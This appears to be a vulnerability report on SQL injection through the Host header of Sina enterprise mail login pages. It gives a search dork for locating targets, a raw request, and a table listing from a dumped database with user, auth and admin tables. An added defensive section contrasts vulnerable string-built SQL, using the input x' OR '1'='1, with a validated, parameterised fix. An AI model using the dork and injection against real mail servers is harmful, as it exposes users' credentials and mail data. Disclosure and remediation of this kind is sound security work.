As in the title.
Login page: intext:新浪企业邮箱 一切由你开始
Cases
http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ ......
The Host parameter is injectable.
Taking http://**.**.**.**/ as an example:
GET / HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ko;q=0.2,ja;q=0.2
Cookie: Email=usrmdinst_0
Database: sinanet
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| pop_mail_recovery | 2123484 |
| maillistmember    | 283314  |
| email             | 280634  |
| userauth          | 280633  |
| userauth_log      | 80729   |
| SNSTORE           | 48563   |
| `domain`          | 41556   |
| department        | 36993   |
| admin             | 24113   |
| enterprise        | 22700   |
| maillistprev      | 20215   |
| CONSUME           | 14352   |
| businesscard      | 10000   |
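
The fix for an injectable Host header, as an added example that is not part of the original report or the vendor's code: the header is checked against hostname syntax and then bound as a query parameter, shown beside the string-concatenation pattern that produces this class of bug. It assumes the login page resolves the tenant from the Host header; the `enterprise_domain` table, its rows and all function names are hypothetical.

```python
import re
import sqlite3

# Constructed schema and rows; table and column names are hypothetical.
def make_demo_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE enterprise_domain (host TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO enterprise_domain VALUES (?, ?)",
                   [("mail.example.com", "Example Corp"),
                    ("mail.example.org", "Example Org")])
    return db

# Hostname labels (letters, digits, inner hyphens) with an optional :port.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOST_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}(?::[0-9]{{1,5}})?")

def normalize_host(raw):
    """Return the lower-cased hostname without port, or None if malformed."""
    if not isinstance(raw, str) or len(raw) > 259:
        return None
    host = raw.lower()
    if not _HOST_RE.fullmatch(host):
        return None
    return host.split(":", 1)[0]

def lookup_unsafe(db, host_header):
    # Vulnerable pattern: header text becomes part of the SQL statement.
    sql = ("SELECT name FROM enterprise_domain WHERE host = '"
           + host_header + "' ORDER BY name")
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, host_header):
    # 1) reject anything that is not hostname syntax, 2) bind the value.
    host = normalize_host(host_header)
    if host is None:
        return []  # the caller should answer 400 Bad Request
    rows = db.execute(
        "SELECT name FROM enterprise_domain WHERE host = ? ORDER BY name", (host,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_demo_db()
    crafted = "x' OR '1'='1"  # constructed textbook input
    print(lookup_unsafe(db, crafted))   # every tenant row comes back
    print(lookup_safe(db, crafted))     # rejected before reaching SQL
    print(lookup_safe(db, "MAIL.example.com:443"))
```

Rejected Host values are also worth logging: a quote, space or parenthesis in that header does not occur in normal browser traffic.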